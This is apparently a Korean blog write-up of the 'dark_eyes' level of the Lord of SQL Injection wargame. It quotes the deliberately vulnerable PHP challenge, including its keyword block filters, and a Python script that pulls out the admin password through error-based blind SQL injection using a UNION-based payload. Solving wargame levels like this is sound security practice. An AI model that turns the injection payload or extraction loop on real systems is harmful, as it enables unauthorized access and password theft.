-
LOS dark_eyesWebHacking/Load Of Sql Injection 2018. 2. 18. 02:58123456789101112131415161718<?phpinclude "./config.php";login_chk();dbconnect();if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");$query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";$result = @mysql_fetch_array(mysql_query($query));if(mysql_error()) exit();echo "<hr>query : <strong>{$query}</strong><hr><br>";$_GET[pw] = addslashes($_GET[pw]);$query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";$result = @mysql_fetch_array(mysql_query($query));if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");highlight_file(__FILE__);?>
cs 아까와 같은 error blind sql injection문제다.
이 문제에서는 union함수 특징을 이용하여서 문제를 풀수있다.
12345678910111213141516171819202122232425import urllib2j = 1input_ = 33 #0passwd = ''while(True):url = 'https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=\' or id=\'admin\' and (select 1 union select substr(pw,%d,1)=0x%x)' %(j,input_)url += '%23'req = urllib2.Request(url)req.add_header('User-Agent','Mozilla/5.0')req.add_header('cookie','PHPSESSID=cou72qt1ouduhumnfslep8oaa2')data = urllib2.urlopen(req).read()if 'include' in data:passwd += chr(input_)j += 1print 'Search Key is '+passwdprint 'Search hex Key is %d'%(input_)if len(passwd) == 8:breakinput_= 33else:input_+=0x1print 'Key is '+passwdcs union함수는 중첩되는 값이 있으면 그 중 맨 첫번째 값만 출력시키는 특징을 가지고있다.
select 1에다가 substr이 조건에 true라면 1을반환하고 select 1 union select 1과 같은 쿼리문이 만들어지는데 union으로인해 1한개만 출력이된다)
false라면 1,0이 출력이 된다.
'WebHacking > Load Of Sql Injection' 카테고리의 다른 글
LOS umaru (0) 2018.02.18 LOS hell_fire, evil_wizard (0) 2018.02.18 LOS iron_golem (0) 2018.02.18 LOS dragon (0) 2018.02.18 LOS navis (0) 2018.02.15